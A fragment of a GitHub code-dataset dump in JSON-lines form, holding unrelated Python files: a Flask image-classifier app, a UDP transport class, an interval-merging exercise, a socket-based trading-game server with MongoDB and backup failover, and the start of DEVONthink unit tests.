np.array(y_test)\r\n\r\n # Fit the model to the training data\r\n history = model.fit(x_train, y_train, epochs=10, batch_size=4, validation_data=(x_test, y_test))\r\n\r\n # Save the model\r\n model.save(os.path.join(model_dir, model_name))\r\n flash('Training completed successfully!', 'success')\r\n\r\n if 'predict' in request.form:\r\n if 'files' in request.files:\r\n uploaded_folder = request.files.getlist(\"files\")\r\n predictions = []\r\n count = 0\r\n image_data_uris = []\r\n for file in uploaded_folder:\r\n # Check if the selected item is a folder\r\n if file.filename != '':\r\n # Get the file's directory and filename\r\n count += 1\r\n image_content = file.read()\r\n image = tf.image.decode_image(image_content, channels=3)\r\n image = tf.image.resize(image, (299, 299))\r\n image = image / 255.0\r\n image = np.expand_dims(image, axis=0)\r\n directory, filename = os.path.split(file.filename)\r\n if 'Original Inception V3 Model' in request.form.getlist('checkbox'):\r\n # Load the original model\r\n model = tf.keras.applications.InceptionV3(weights='imagenet')\r\n predictionss = model.predict(image)\r\n # Decode the predictions\r\n predicted_classes = tf.keras.applications.inception_v3.decode_predictions(predictionss, top=1)\r\n label_name = str(predicted_classes[0][0][1]).title()\r\n confidence = predicted_classes[0][0][2]\r\n confidence = round(confidence, 2)\r\n predictions.append((count, filename, label_name, confidence))\r\n else:\r\n if not os.path.isdir(model_dir):\r\n alert = 'You need to train model first!! Model file does not exist'\r\n return render_template('upload.html', alert=alert)\r\n elif len(os.listdir(model_dir)) == 0:\r\n alert = 'You need to train model first!! Model file does not exist'\r\n return render_template('upload.html', alert=alert)\r\n # Load the label encoder object from a file\r\n\r\n with open(os.path.join(model_dir, label_encoder_name), 'rb') as f:\r\n label_encoder = pickle.load(f)\r\n # Load the trained model\r\n model = tf.keras.models.load_model(os.path.join(model_dir, model_name))\r\n # Make a prediction\r\n prediction = model.predict(image)\r\n class_index = np.argmax(prediction[0])\r\n confidence = prediction[0][class_index]\r\n confidence = round(confidence, 2)\r\n # Get the label names from the label encoder\r\n label_names = label_encoder.inverse_transform([class_index])\r\n label_name = str(label_names[0]).title()\r\n predictions.append((count, filename, label_names[0], confidence))\r\n # Create a file-like object from the image data\r\n image_file = BytesIO(image_content)\r\n # Load the image using PIL\r\n # Load the image using PIL\r\n image = Image.open(image_file)\r\n image = image.resize(size=(200,200))\r\n # Create a draw object\r\n draw = ImageDraw.Draw(image)\r\n\r\n # Choose a font and font size\r\n font = ImageFont.truetype('arial.ttf', 16)\r\n\r\n # Get the size of the image\r\n width, height = image.size\r\n\r\n # Calculate the position of the text\r\n text_x = 10\r\n text_y = 10\r\n # Draw the text on the image\r\n draw.text((text_x, text_y), label_name, font=font, fill=(255, 255, 255))\r\n\r\n text_width, text_height = draw.textsize(str(confidence), font=font)\r\n # Calculate the position of the text\r\n text_x = width - text_width - 10\r\n text_y = 10\r\n\r\n # Draw the text on the image\r\n draw.text((text_x, text_y), str(confidence), font=font, fill=(255, 255, 255))\r\n\r\n text_width, text_height = draw.textsize(str(filename), font=font)\r\n # Calculate the position of the text\r\n text_x = 10\r\n text_y = height - text_height - 10\r\n\r\n # Draw the text on the image\r\n draw.text((text_x, text_y), str(filename), font=font, fill=(255, 255, 255))\r\n\r\n # Save the image to a buffer\r\n buffer = BytesIO()\r\n image.save(buffer, format='jpeg')\r\n # Encode the image data as a data URI\r\n image_data = buffer.getvalue()\r\n image_data_uri = base64.b64encode(image_data).decode(\"utf-8\")\r\n image_data_uri = f\"data:image/jpeg;base64,{image_data_uri}\"\r\n\r\n # Append the data URI to the list of image data URIs\r\n image_data_uris.append(image_data_uri)\r\n\r\n\r\n return render_template('upload.html', predictions=predictions, image_data_uris=image_data_uris)\r\n\r\n return render_template('upload.html')\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=8000, debug=True)\r\n\r\n","repo_name":"rajeshm71/UITrainer","sub_path":"MyApp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2832593608","text":"import asyncio\nimport socket\nimport struct\n\nfrom anyio import create_udp_socket, create_connected_udp_socket\n\nfrom transport import Transport\n\nclass Udp_socket(Transport):\n \"\"\"Class for work with UDP socket.\n Containe asynchronous function wrapper.\n \"\"\"\n def __init__(self, local_port: int = 2000, \n remote_host: str = 'localhost', \n remote_port: int = 2001):\n \"\"\"\n Args:\n local_port (int, optional): local UDP port. Defaults to 2000.\n remote_host (str, optional): remote UDP host. Defaults to 'localhost'.\n remote_port (int, optional): remote UDP port. Defaults to 2001.\n \"\"\"\n self.local_port = local_port\n self.remote_host = remote_host\n self.remote_port = remote_port\n\n\n async def send_data(self, data: bytes):\n \"\"\"Asynchronous function for sending data to udp socket\n\n Args:\n data (bytes): encoded data for send to udp socket\n \"\"\"\n try:\n async with await create_connected_udp_socket(family = socket.AF_INET, \n remote_host = self.remote_host, \n remote_port = self.remote_port, \n local_host = 'localhost',\n local_port = self.local_port - 1) as udp:\n\n await udp.send(bytes(data))\n except:\n print(\"can't send to host {}:{}\".format(self.remote_host, self.remote_port))\n \n\n async def listen_data(self):\n \"\"\"Asynchronous function for received data from can bus\n\n Returns:\n [bytes]: if received success return encoded data, else return None\n \"\"\"\n try:\n async with await create_udp_socket(family = socket.AF_INET, local_port = self.local_port, local_host = 'localhost') as udp:\n async for packet, _ in udp:\n return packet\n except:\n print(\"can't receive from port: {}\".format(self.local_port))\n await asyncio.sleep(10)\n","repo_name":"emil110778/can_udp_manager","sub_path":"udp_transport.py","file_name":"udp_transport.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41582506174","text":"def merge_intervals(intervals):\n print('Input intervals:', intervals)\n\n for i in range(len(intervals) - 1):\n a1, a2 = intervals[i]\n b1, b2 = intervals[i + 1]\n if b1 <= a2 + 1:\n c1 = min(a1, b1)\n c2 = max(a2, b2)\n intervals[i] = None\n intervals[i + 1] = (c1, c2)\n\n output_intervals = list(filter(None, intervals))\n print('Output intervals:', output_intervals)\n print()\n return output_intervals\n\n\nif __name__ == '__main__':\n assert merge_intervals([(1, 4), (2, 6), (8, 10), (12, 19)]) == [(1, 6), (8, 10), (12, 19)], \"First\"\n assert merge_intervals([(1, 12), (2, 3), (4, 7)]) == [(1, 12)], \"Second\"\n assert merge_intervals([(1, 5), (6, 10), (10, 15), (17, 20)]) == [(1, 15), (17, 20)], \"Third\"\n\n\n# # Imported - reduce\n# from functools import reduce\n#\n#\n# def merge_intervals(intervals):\n#\n# def combine(value, element):\n# if value:\n# last_begin, last_end = value[-1]\n# if element[0] <= last_end + 1:\n# value[-1] = (last_begin, max(last_end, element[1]))\n# else:\n# value.append(element)\n# else:\n# value = [element]\n# return value\n#\n# return reduce(combine, intervals, [])","repo_name":"ogorodnikov/pycheck","sub_path":"Other/merge_intervals.py","file_name":"merge_intervals.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24088494674","text":"import socket\nimport json\nimport time\nimport hashlib\nimport random\nimport calendar\nimport time\nfrom pymongo import MongoClient\nfrom threading import Thread\nfrom threading import Lock\n\ndebug = True\n\ndef recievejson(sock):\n data = ''\n while not is_json(data):\n try:\n chunk = sock.recv(4096).decode('utf-8')\n data += chunk\n except socket.timeout:\n break\n if is_json(data):\n return json.loads(data)\n else:\n return None\n\ndef getipaddress():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect(('itb.ac.id', 0))\n ip = s.getsockname()[0]\n s.close()\n return ip\n\ndef genhash(username, password):\n h = hashlib.md5()\n h.update((username + \":\").encode('utf-8'))\n h.update(password.encode('utf-8'))\n tyme = time.gmtime()\n h.update(time.strftime(\"%Y-%m-%d %H:%M:%S\",tyme).encode('utf-8'))\n import calendar\n return (h.hexdigest(), calendar.timegm(tyme))\n\ndef genrandomhash():\n hash = random.getrandbits(128)\n return str(hash)\n\ndef mixitem(item1, item2):\n if item1==0 and item2==1 or item1==1 and item2==0:\n return 4\n elif item1==1 and item2==2 or item1==2 and item2==1:\n return 5\n elif item1==2 and item2==3 or item1==3 and item2==2:\n return 6\n elif item1==5 and item2==4 or item1==4 and item2==5:\n return 7\n elif item1==5 and item2==6 or item1==6 and item2==5:\n return 8\n elif item1==7 and item2==8 or item1==8 and item2==7:\n return 9\n else:\n return 10\n\ndef is_json(data):\n try:\n json_object = json.loads(data)\n except ValueError:\n return False\n return True\n\nclass SpfServer:\n def __init__(self,addr,port,backup,db):\n self.upper = []\n self.downer = []\n self.ip = addr\n self.port = port\n self.backup = backup['value']\n self.main_ip = backup['ip']\n self.main_port = backup['port']\n self.backup_ip = ''\n self.backup_port = 0\n self.servers = []\n self.dbname = db\n self.initdb(self.dbname)\n self.initserver()\n self.itemcachelock = Lock()\n self.tracker = socket.socket()\n if not self.backup:\n self.conntracker()\n print('You are the main server')\n else:\n self.connmainserver()\n print('You are the backup server')\n\n\n def __del__(self):\n if hasattr(self, 'dbclient'):\n self.dbclient.close()\n del self.db\n if hasattr(self, 'tracker'):\n self.tracker.close()\n if hasattr(self, 'server'):\n self.server.close()\n\n def initdb(self,dbname):\n self.dbclient = MongoClient()\n self.db = self.dbclient[dbname]\n print('Database Connected')\n\n def conntracker(self):\n self.tracker.connect(('167.205.32.46',8000))\n print('Tracker Connected')\n\n def connmainserver(self):\n self.tracker.connect((self.main_ip,self.main_port))\n print('Main Server Connected')\n\n def initserver(self): # listening socket\n self.server = socket.socket()\n self.server.bind(('',self.port))\n print(self.ip+','+str(self.port))\n print('Server ready to listen')\n\n def gettracker(self): # hanya dipanggil pada awal koneksi ke tracker\n message = '{\"method\":\"join\", \"ip\":\"'+self.ip+'\",\"port\":'+str(self.port)+'}'\n self.tracker.send(bytes(message,'utf-8'))\n data = ''\n while not is_json(data):\n chunk = self.tracker.recv(4096).decode('utf-8')\n data += chunk\n if debug:\n print(data)\n if data != \"\":\n decoded = json.loads(data)\n status = decoded['status']\n if status == \"ok\":\n self.servers = decoded['value']\n return 0\n else:\n self.servers = None\n self.error = decoded['description']\n return 1\n\n def getcacheitem(self,item):\n self.itemcachelock.acquire()\n\n refresh = False\n # cari informasi cache offer\n infocache = self.db.offercache.find_one({'item_number':item})\n jsonofferlist = None\n if (infocache == None):\n refresh = True\n else:\n # kalau cache kosong atau cache expired (lebih dari 3000 detik)\n if (calendar.timegm(time.gmtime()) - infocache['time']) > 3000 :\n refresh = True\n self.db.offercache.remove({'item_number':item})\n self.db.offercache.remove({'offered_item':item})\n else:\n jsonofferlist = self.db.offercache.find({'offered_item':item})\n\n if refresh:\n servers = self.servers\n srvthread = []\n jsonofferlist = []\n for server in servers:\n if server['ip'] == self.ip and server['port'] == self.port:\n continue\n thr = SpfSendFindThread(server['ip'],server['port'],item)\n thr.daemon = True\n thr.start()\n srvthread.append(thr)\n for thr in srvthread:\n thr.join()\n for thr in srvthread:\n if thr.data == None:\n continue\n status = thr.data['status']\n if status == \"ok\":\n for recvoffer in thr.data['offers']:\n if debug:\n print(recvoffer)\n try:\n if int(recvoffer[0]) == item:\n jsonofferlist.append({'token':recvoffer[5], 'offered_item':int(recvoffer[0]), \\\n 'n1':int(recvoffer[1]), 'demanded_item':int(recvoffer[2]), \\\n 'n2':int(recvoffer[3]), 'availability':recvoffer[4], \\\n 'ip':thr.server, 'port':thr.port})\n except ValueError:\n continue\n for offer in jsonofferlist:\n self.db.offercache.insert(offer)\n self.db.offercache.insert({'item_number':item, 'time':calendar.timegm(time.gmtime())})\n # return hasil cache dan unlock\n self.itemcachelock.release()\n return jsonofferlist\n\n def searchcachetoken(self,token):\n self.itemcachelock.acquire()\n result = self.db.offercache.find_one({'token':token})\n self.itemcachelock.release()\n return result\n\n def removecachetoken(self,token):\n self.itemcachelock.acquire()\n result = self.db.offercache.remove({'token':token})\n self.itemcachelock.release()\n\n def start(self):\n print('Starting')\n status = self.gettracker()\n print('Get tracker')\n print('Servers: ',self.servers)\n if status == 1:\n print('Error', self.error)\n exit()\n self.tracker.close()\n self.trkthread = SpfTrackerThread(self)\n self.trkthread.daemon = True\n self.trkthread.start()\n self.msvthread = SpfMainServerThread(self)\n self.msvthread.daemon = True\n self.msvthread.start()\n self.bckthread = SpfBackupThread(self)\n self.bckthread.daemon = True\n self.bckthread.start()\n self.server.listen(1)\n while True:\n try:\n print('Cari client')\n conn, addr = self.server.accept()\n print('Dapet client')\n SpfListenerThread(self, conn).start()\n except SystemExit:\n print('keyboard interupt!')\n break\n\nclass SpfMainServerThread(Thread):\n def __init__(self,srv):\n Thread.__init__(self)\n self.srv = srv\n\n def run(self):\n while True:\n try:\n time.sleep(3)\n if self.srv.backup_ip != '' and self.srv.backup_port != 0:\n sock = socket.socket()\n sock.settimeout(10)\n try:\n sock.connect((self.srv.backup_ip,self.srv.backup_port))\n data = {'method':'serverStatus','server':self.srv.servers}\n data['server'].index({'ip':self.srv.ip,'port':self.srv.port})\n jstring = json.dumps(data)\n if debug:\n print(\"Send server status\",jstring)\n sock.send(bytes(jstring,'utf-8'))\n response = recievejson(sock)\n if response == None:\n response = json.loads('{\"status\":\"fail\",\"description\":\"JSON Parsing error\"}')\n if debug:\n print(\"Receive server status: \",response)\n finally:\n sock.close()\n except SystemExit:\n break\n\nclass SpfBackupThread(Thread):\n def __init__(self,srv):\n Thread.__init__(self)\n self.srv = srv\n\n def run(self):\n while True:\n try:\n time.sleep(3)\n if self.srv.backup:\n sock = socket.socket()\n sock.settimeout(10)\n try:\n sock.connect((self.srv.main_ip,self.srv.main_port))\n servers = self.srv.downer + [{'ip':self.srv.ip,'port':self.srv.port}]\n data = {'method':'backup','server':servers}\n jstring = json.dumps(data)\n if debug:\n print(\"Send backup: \",jstring)\n sock.send(bytes(jstring,'utf-8'))\n response = recievejson(sock)\n if response == None:\n response = json.loads('{\"status\":\"fail\",\"description\":\"JSON Parsing error\"}')\n if debug:\n print(\"Receive backup: \",response)\n if response['status']=='ok':\n self.srv.upper = response['server']\n except (socket.timeout,ConnectionRefusedError): #Takeover the main server\n self.srv.upper.pop()\n self.srv.tracker = socket.socket()\n if self.srv.upper == []:\n self.srv.backup = False\n print('You are now the main server')\n self.srv.conntracker()\n else:\n self.srv.main_ip = self.srv.upper[-1]['ip']\n self.srv.main_port = self.srv.upper[-1]['port']\n self.srv.connmainserver()\n self.srv.gettracker()\n finally:\n sock.close()\n except SystemExit:\n break\n\nclass SpfTrackerThread(Thread):\n def __init__(self,srv):\n Thread.__init__(self)\n self.srv = srv\n\n def run(self):\n while True:\n try:\n time.sleep(10)\n print('Servers: ',self.srv.servers)\n print('('+self.srv.ip+','+str(self.srv.port)+')')\n except SystemExit:\n break\n\nclass SpfListenerThread(Thread):\n def __init__(self,srv, sock):\n Thread.__init__(self)\n self.daemon = True\n self.srv = srv\n self.sock = sock\n\n def process(self, message):\n if message['method']== 'signup':\n if 'username' in message and 'password' in message:\n if self.srv.db.user.find_one({'username':message['username']}) == None:\n self.srv.db.user.insert({'username':message['username'],'password':message['password'], 'inventory':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'field':True, 'x':0, 'y':0})\n return json.dumps({'status':'ok'})\n else:\n return json.dumps({'status':'fail', 'description':'Username exists'})\n return json.dumps({'status':'error'})\n elif message['method']== 'serverStatus':\n if 'server' in message:\n self.srv.servers = message['server']\n return json.dumps({'status':'ok','servers':self.srv.servers})\n return json.dumps({'status':'error'})\n elif message['method']== 'login':\n if 'username' in message and 'password' in message:\n user = self.srv.db.user.find_one({'username':message['username'], 'password':message['password']})\n if user != None:\n token = genhash(user['username'], user['password'])\n if self.srv.db.active_user.find_one({'username':message['username']}) == None:\n self.srv.db.active_user.insert({'username':message['username'],'token':token[0]})\n else:\n self.srv.db.active_user.update_one({'username':message['username']},{'$set':{'token':token[0]}})\n return json.dumps({'status':'ok', 'token':token[0], 'x':user['x'], 'y':user['y'], 'time':token[1]})\n else:\n return json.dumps({'status':'fail', 'description':'Invalid username/password'})\n return json.dumps({'status':'error'})\n elif message['method']=='inventory':\n if 'token' in message:\n active_user = self.srv.db.active_user.find_one({'token':message['token']})\n if active_user != None:\n inventory = self.srv.db.user.find_one({'username':active_user['username']}, {'inventory':1,'_id':0 })['inventory']\n return json.dumps({'status':'ok', 'inventory':inventory})\n return json.dumps({'status':'error'})\n elif message['method']=='mixitem':\n if 'token' in message and 'item1' in message and 'item2' in message:\n active_user = srv.db.active_user.find_one({'token':message['token']})\n if active_user != None:\n inventory = srv.db.user.find_one({'username':active_user['username']}, {'inventory':1,'_id':0 })['inventory']\n mix = mixitem(message['item1'], message['item2'])\n if mix < 10 and inventory[message['item1']] > 0 and inventory[message['item2']] > 0:\n inventory[message['item1']] -= 1\n inventory[message['item2']] -= 1\n inventory[mix] += 1\n srv.db.user.update_one({'username':active_user['username']},{'$set':{'inventory':inventory}})\n return json.dumps({'status':'ok', 'inventory':inventory})\n elif mix == 10:\n return json.dumps({'status':'fail', 'description':'Wrong mixture'})\n elif inventory[message['item1']] == 0 or inventory[message['item2']] == 0:\n return json.dumps({'status':'fail', 'description':'Not enough item'})\n return json.dumps({'status':'error'})\n elif message['method']=='map':\n if 'token' in message:\n active_user = self.srv.db.active_user.find_one({'token':message['token']})\n if active_user != None:\n map = self.srv.db.map.find_one()\n return json.dumps({'status':'ok', 'name':map['name'], 'width':int(map['width']), 'height':int(map['height'])})\n return json.dumps({'status':'error'})\n elif message['method']=='move':\n if 'token' in message and 'x' in message and 'y' in message:\n active_user = self.srv.db.active_user.find_one({'token':message['token']})\n if active_user != None:\n user = self.srv.db.user.find_one({'username':active_user['username']})\n map = self.srv.db.map.find_one()\n if (int(message['x']) != user['x'] or int(message['y']) != user['y']) and int(message['x']) >= 0 and int(message['y']) >= 0\\\n and message['x'] <= map['width'] and message['y'] <= map['height']:\n self.srv.db.user.update_one({'username':active_user['username']},{'$set':{'x':message['x'], 'y':message['y'], 'field':True}})\n import calendar\n return json.dumps({'status':'ok', 'time':calendar.timegm(time.gmtime())+10})\n elif message['x'] == user['x'] and message['y'] == user['y']:\n return json.dumps({'status':'fail', 'description':'Yer character is not moving'})\n else:\n return json.dumps({'status':'fail', 'description':'Out of bounds'})\n return json.dumps ({'status':'error'})\n elif message['method']=='field':\n if 'token' in message:\n active_user = self.srv.db.active_user.find_one({'token':message['token']})\n if active_user != None:\n user = self.srv.db.user.find_one({'username':active_user['username']})\n user_field = user['field']\n inventory = user['inventory']\n item = int(self.srv.db.map.find_one()['map'][user['x']][user['y']])\n if user_field:\n inventory[item] += 1\n self.srv.db.user.update_one({'username':active_user['username']}, {'$set':{'field':False, 'inventory':inventory}})\n return json.dumps({'status':'ok', 'item':int(item)})\n else:\n return json.dumps({'status':'fail', 'description':'Item already taken in ('+str(user['x'])+','+str(user['y'])+')'})\n return json.dumps({'status':'error'})\n elif message['method']=='offer':\n if 'token' in message and 'offered_item' in message and 'n1' in message and 'demanded_item' in message and 'n2' in message:\n active_user = self.srv.db.active_user.find_one({'token':message['token']})\n if active_user != None:\n offered_item = int(message['offered_item'])\n inventory = self.srv.db.user.find_one({'username':active_user['username']})['inventory']\n if int(message['n1']) <= inventory[offered_item]:\n inventory[offered_item] -= int(message['n1'])\n self.srv.db.tradebox.insert({'token':genrandomhash(), 'offered_item':message['offered_item'], \\\n 'n1':message['n1'], 'demanded_item':message['demanded_item'], 'n2':message['n2'], 'availability':'true', \\\n 'username':active_user['username']})\n self.srv.db.user.update_one({'username':active_user['username']}, {'$set':{'inventory':inventory}})\n return json.dumps({'status':'ok'})\n else:\n return json.dumps({'status':'fail', 'description':'Insufficient offer'})\n return json.dumps({'status':'error'})\n elif message['method']=='tradebox':\n if 'token' in message:\n active_user = self.srv.db.active_user.find_one({'token':message['token']})\n if active_user != None:\n offers = []\n list = self.srv.db.tradebox.find({'username':active_user['username']})\n for offer in list:\n offers.append([int(offer['offered_item']), int(offer['n1']), int(offer['demanded_item']), int(offer['n2']), offer['availability'], offer['token']])\n return json.dumps({'status':'ok', 'offers':offers})\n return json.dumps({'status':'error'})\n elif message['method']=='sendfind':\n if 'token' in message and 'item' in message:\n active_user = self.srv.db.active_user.find_one({'token':message['token']})\n if active_user != None:\n offers = []\n list = self.srv.db.tradebox.find({'offered_item':message['item'], 'username':{'$ne':active_user['username']}, 'availability':'true'})\n for offer in list:\n offers.append([int(offer['offered_item']), int(offer['n1']), int(offer['demanded_item']), int(offer['n2']), offer['availability'], offer['token']])\n\n cachejsonlist = self.srv.getcacheitem(int(message['item']))\n for offer in cachejsonlist:\n offers.append([int(offer['offered_item']), int(offer['n1']), int(offer['demanded_item']), int(offer['n2']), offer['availability'], offer['token']])\n\n return json.dumps({'status':'ok', 'offers':offers})\n return json.dumps({'status':'error'})\n elif message['method']=='findoffer':\n if 'item' in message:\n offers = []\n list = self.srv.db.tradebox.find({'offered_item':message['item']})\n for offer in list:\n offers.append([offer['offered_item'], offer['n1'], offer['demanded_item'], offer['n2'], offer['availability'], offer['token']])\n return json.dumps({'status':'ok', 'offers':offers})\n return json.dumps({'status':'error'})\n elif message['method']=='sendaccept':\n if 'token' in message and 'offer_token' in message:\n active_user = self.srv.db.active_user.find_one({'token':message['token']})\n if active_user != None:\n inventory = self.srv.db.user.find_one({'username':active_user['username']})['inventory']\n offer = self.srv.db.tradebox.find_one({'token':message['offer_token']})\n\n # maybe in trade box\n if offer != None:\n if int(offer['n2']) > inventory[offer['demanded_item']]:\n return json.dumps({'status':'fail', 'description':'Insufficient demand'})\n # update tradebox\n self.srv.db.tradebox.update_one({'token':message['offer_token']},\\\n {'$set':{'availability':'false'}})\n # update inventory\n inventory[offer['demanded_item']] -= int(offer['n2'])\n inventory[offer['offered_item']] += int(offer['n1'])\n self.srv.db.user.update_one({'username':active_user['username']}, {'$set':{'inventory':inventory}})\n return json.dumps({'status':'ok'})\n # maybe in item cache\n offer = srv.searchcachetoken(message['offer_token'])\n if offer != None:\n if int(offer['n2']) > inventory[offer['demanded_item']]:\n return json.dumps({'status':'fail', 'description':'Insufficient demand'})\n\n # send accept offer to corresponding server\n sock = socket.socket()\n sock.connect((offer['ip'], offer['port']))\n sock.settimeout(10)\n jstring = '{\"method\":\"accept\", \"offer_token\":'+message['offer_token']+'}'\n sock.send(bytes(jstring,'utf-8'))\n data = ''\n while not is_json(data):\n try:\n chunk = self.sock.recv(4096).decode('utf-8')\n data += chunk\n except socket.timeout:\n break\n sock.close()\n if debug:\n print(data)\n if is_json(data):\n #delete offer from cache\n srv.removecachetoken(message['offer_token'])\n decoded = json.loads(data)\n status = decoded['status']\n if status == \"ok\":\n # update inventory\n inventory[offer['demanded_item']] -= int(offer['n2'])\n inventory[offer['offered_item']] += int(offer['n1'])\n self.srv.db.user.update_one({'username':active_user['username']}, {'$set':{'inventory':inventory}})\n return json.dumps({'status':'ok'})\n else:\n return json.dumps({'status':'fail', 'description':'Offer unavailable in corresponding server'})\n else:\n return json.dumps({'status':'fail', 'description':'Server corresponding to offer fail to respond'})\n # nowhere found!\n return json.dumps({'status':'fail', 'description':'Offer not found'})\n else:\n return json.dumps({'status':'fail', 'description':'User not exist'})\n return json.dumps({'status':'error'})\n elif message['method']=='accept':\n if 'offer_token' in message:\n offer = self.srv.db.tradebox.find_one({'token':message['offer_token']})\n if offer != None:\n if offer['availability']=='true' :\n self.srv.db.tradebox.update_one({'token':message['offer_token']},\\\n {'$set':{'availability':'false'}})\n return json.dumps({'status':'ok'})\n else:\n return json.dumps({'status':'fail', 'description':'Offer not available'})\n else:\n return json.dumps({'status':'fail', 'description':'Offer not exist'})\n return json.dumps({'status':'error'})\n elif message['method']=='fetchitem':\n if 'token' in message and 'offer_token' in message:\n active_user = self.srv.db.active_user.find_one({'token':message['token']})\n if active_user != None:\n inventory = self.srv.db.user.find_one({'username':active_user['username']})['inventory']\n offer = self.srv.db.tradebox.find_one({'token':message['offer_token']})\n if offer != None:\n if offer['availability'] != 'true':\n self.srv.db.tradebox.update_one({'token':message['offer_token']},\\\n {'$set':{'availability':'false'}})\n inventory[int(offer['demanded_item'])] += offer['n2']\n self.srv.db.user.update_one({'username':active_user['username']}, {'$set':{'inventory':inventory}})\n self.srv.db.tradebox.delete_one({'token':message['offer_token']})\n return json.dumps({'status':'ok'})\n else:\n return json.dumps({'status':'fail', 'description':'Offer still available'})\n else:\n return json.dumps({'status':'fail', 'description':'Offer not exist'})\n else:\n return json.dumps({'status':'fail', 'description':'User not exist'})\n return json.dumps({'status':'error'})\n elif message['method']=='canceloffer':\n if 'token' in message and 'offer_token' in message:\n active_user = self.srv.db.active_user.find_one({'token':message['token']})\n if active_user != None:\n inventory = self.srv.db.user.find_one({'username':active_user['username']})['inventory']\n offer = self.srv.db.tradebox.find_one({'token':message['offer_token']})\n if offer != None:\n if offer['availability'] == 'true':\n self.srv.db.tradebox.delete_one({'token':message['offer_token']})\n inventory[int(offer['offered_item'])] += offer['n1']\n self.srv.db.user.update_one({'username':active_user['username']}, {'$set':{'inventory':inventory}})\n return json.dumps({'status':'ok'})\n else:\n return json.dumps({'status':'fail', 'description':'Offer already finished'})\n else:\n return json.dumps({'status':'fail', 'description':'Offer not exist'})\n else:\n return json.dumps({'status':'fail', 'description':'User not exist'})\n return json.dumps({'status':'error'})\n elif message['method']=='join':\n if 'ip' in message and 'port' in message:\n return json.dumps({'status':'ok','value':self.srv.servers})\n return json.dumps({'status':'error'})\n elif message['method']=='backup':\n if 'server' in message:\n try:\n if self.srv.backup_ip == '' or (self.srv.backup_ip == message['server'][-1]['ip'] and\\\n self.srv.backup_port == message['server'][-1]['port']):\n self.srv.downer = message['server']\n upper = self.srv.upper + [{'ip':self.srv.ip,'port':self.srv.port}]\n return json.dumps({'status':'ok','server':upper})\n else:\n return json.dumps({'status':'fail','description':'Backup server still running'})\n except ValueError:\n self.srv.backup_ip = ''\n self.srv.backup_port = 0\n return json.dumps({'status':'fail','description':'Invalid ip/port'})\n return json.dumps({'status':'error'})\n else:\n return '{\"status\":\"error\"}'\n\n def run(self):\n try:\n print('Server to client thread running')\n print(self.sock)\n self.sock.settimeout(60)\n data = ''\n while not is_json(data):\n chunk = self.sock.recv(4096).decode('utf-8')\n data += chunk\n try:\n message = json.loads(data)\n if debug:\n print(message)\n except ValueError:\n response = '{\"status\":\"error\"}'\n if 'method' in message:\n response = self.process(message)\n else:\n response = '{\"status\":\"error\"}'\n if debug:\n print(response)\n self.sock.send(bytes(response,'utf-8'))\n finally:\n self.sock.close()\n\nclass SpfSendFindThread(Thread):\n ip = 'String'\n port = 'Number'\n item = 'List'\n data = None\n def __init__(self,ip,port,item):\n Thread.__init__(self)\n self.sock = socket.socket()\n self.ip = ip\n self.port = port\n self.item = item\n self.sock.settimeout(3)\n self.data = None\n\n def run(self):\n try:\n self.sock.connect((self.ip,self.port))\n jstring = '{\"method\":\"findoffer\", \"item\":'+str(self.item)+'}'\n if debug:\n print(jstring)\n self.sock.send(bytes(jstring,'utf-8'))\n self.data = recievejson(self.sock)\n if debug and self.data != None:\n print(self.data)\n finally:\n self.sock.close()\n\nclass ServerThread (Thread):\n def __init__(self,addr,port,backup,db):\n Thread.__init__(self)\n self.srv = SpfServer(addr,port,backup,db)\n def run (self):\n self.srv.start()\n\ndef arghandler(argv):\n i = 2\n param = ['-db','-backup','-addr']\n while i < len(argv):\n if(argv[i]) == param[0]:\n global db\n i += 1\n if i < len(argv) and argv[i] not in param:\n db = argv[i]\n i += 1\n elif(argv[i]) == param[1]:\n global backup\n backup['value'] = True\n i += 1\n if i < len(argv) and argv[i] not in param:\n backup['ip'] = argv[i]\n i += 1\n if i < len(argv) and argv[i] not in param:\n backup['port'] = int(argv[i])\n i += 1\n else:\n backup['ip'] = ''\n elif(argv[i]) == param[2]:\n global addr\n i += 1\n if i < len(argv) and argv[i] not in param:\n addr = argv[i]\n i += 1\n\nif __name__ == \"__main__\":\n db = 'spf'\n backup = {'value':False,'ip':'','port':0}\n addr = getipaddress()\n import sys\n print(\"Arguments given: \",sys.argv)\n if len(sys.argv) < 2:\n print('Missing argument for port')\n exit()\n try:\n port = int(sys.argv[1])\n except ValueError:\n print('Invalid port')\n exit()\n arghandler(sys.argv)\n thr = ServerThread(addr,port,backup,db)\n thr.daemon = True\n thr.start()\n if debug:\n print('Debugging mode')\n while True:\n try:\n time.sleep(1)\n except (KeyboardInterrupt, SystemExit):\n break\n","repo_name":"daniarherikurniawan/DistributedMarketplaceApplication","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":33273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37755991996","text":"import unittest\nimport typing\nimport logging\nimport re\nfrom pydt3 import DEVONthink3\nfrom pydt3.osascript import OSAScript, OSAObjProxy, OSAObjArray\nfrom pydt3.apps.devonthink.record import Record\nfrom pydt3.apps.devonthink.smartgroup import SmartGroup\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\nclass TestDatabase(unittest.TestCase):\n def __init__(self, methodName=\"runTest\"):\n super().__init__(methodName)\n dbs = DEVONthink3().databases\n assert len(dbs) > 0, \"No databases found\"\n self.dbs = list(dbs)\n \n def test_contents(self):\n for db in self.dbs:\n contents = db.contents\n self.assertTrue(isinstance(contents, typing.Sequence))\n self.assertTrue(all(isinstance(record, Record) for record in contents))\n \n def test_parents(self):\n for db in self.dbs:\n parents = db.parents\n self.assertTrue(isinstance(parents, typing.Sequence))\n self.assertTrue(all(isinstance(record, Record) for record in parents))\n\n def test_records(self):\n for db in self.dbs:\n records = db.records\n self.assertTrue(isinstance(records, typing.Sequence))\n self.assertTrue(all(isinstance(record, 